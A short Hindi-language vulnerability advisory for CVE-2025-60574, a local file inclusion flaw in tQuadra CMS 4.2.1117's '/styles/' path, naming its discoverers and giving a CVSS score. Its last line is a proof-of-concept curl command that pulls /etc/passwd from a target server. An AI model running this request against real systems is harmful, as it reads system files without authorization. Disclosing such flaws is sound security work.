
CVE-2025-60574 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, tQuadra CMS 4.2.1117 में एक लोकल फाइल इन्क्लूज़न भेद्यता, जो क्राफ्टेड GET अनुरोधों के माध्यम से मनमानी फ़ाइल पुनर्प्राप्ति को सक्षम बनाती है।
Stefano Andreatta & Jacopo Candido Augelli
tQuadra CMS 4.2.1117 में एक Local File Inclusion (LFI) भेद्यता की पहचान की गई है। यह समस्या "/styles/" पथ में मौजूद है, जो उपयोगकर्ता द्वारा प्रदत्त इनपुट को उचित रूप से सैनिटाइज़ नहीं करता है। एक हमलावर अंतर्निहित सिस्टम से मनमानी फ़ाइलें प्राप्त करने के लिए एक विशेष रूप से तैयार GET अनुरोध भेजकर इसका शोषण कर सकता है।
खोजकर्ता: Stefano Andreatta & Jacopo Candido Augelli
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip
